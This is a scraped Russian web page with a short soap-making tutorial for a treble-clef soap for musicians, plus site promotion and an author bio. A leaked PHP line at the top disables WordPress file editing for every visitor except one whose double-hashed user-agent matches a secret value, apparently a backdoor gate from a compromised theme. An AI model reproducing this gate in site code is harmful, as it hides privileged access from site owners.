if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мастер-класс, как сделать своими руками мыльце “Скрипичный ключ” для музыкантов | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мастер-класс, как сделать своими руками мыльце “Скрипичный ключ” для музыкантов

Попробуем сделать мыло "Скрипичный ключ" своими руками. Оно станет отличным подарком каждому, кто занимается музыкой профессионально

Попро­бу­ем сде­лать мыло “Скри­пич­ный ключ” сво­и­ми рука­ми. Оно ста­нет отлич­ным подар­ком каж­до­му, кто зани­ма­ет­ся музы­кой про­фес­си­о­наль­но. Изго­то­вить такое мыло сво­и­ми рука­ми совер­шен­но неслож­но. Глав­ное — най­ти фор­му в виде скри­пич­но­го ключа.

Для нача­ла нуж­но рас­то­пить про­зрач­ную мыль­ную осно­ву и кап­нуть туда немно­го зеле­но­го или изу­мруд­но­го пиг­мен­та. Этой зеле­ной сме­сью залить фигур­ку скри­пич­но­го клю­ча и ноты. Если мыль­ная мас­са выхо­дит за края фигур­ки, про­сто убе­ри­те излиш­ки зубо­чист­кой. Для фона мож­но про­сто взять про­зрач­ную осно­ву, доба­вить в нее базо­вое мас­ло, кра­си­тель (в дан­ном слу­чае «Сереб­ро») и любую отдуш­ку по вку­су. Полу­чен­ной сме­сью запол­нить осталь­ное про­стран­ство фор­мы. Осты­ва­ет мыло в тече­ние часа.

ключ2

ключ3


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия Евланова

Уже давно увлекаюсь мыловарением. Вот нашла интересный сайт, где можно показать свои творения! Читайте все мои записи!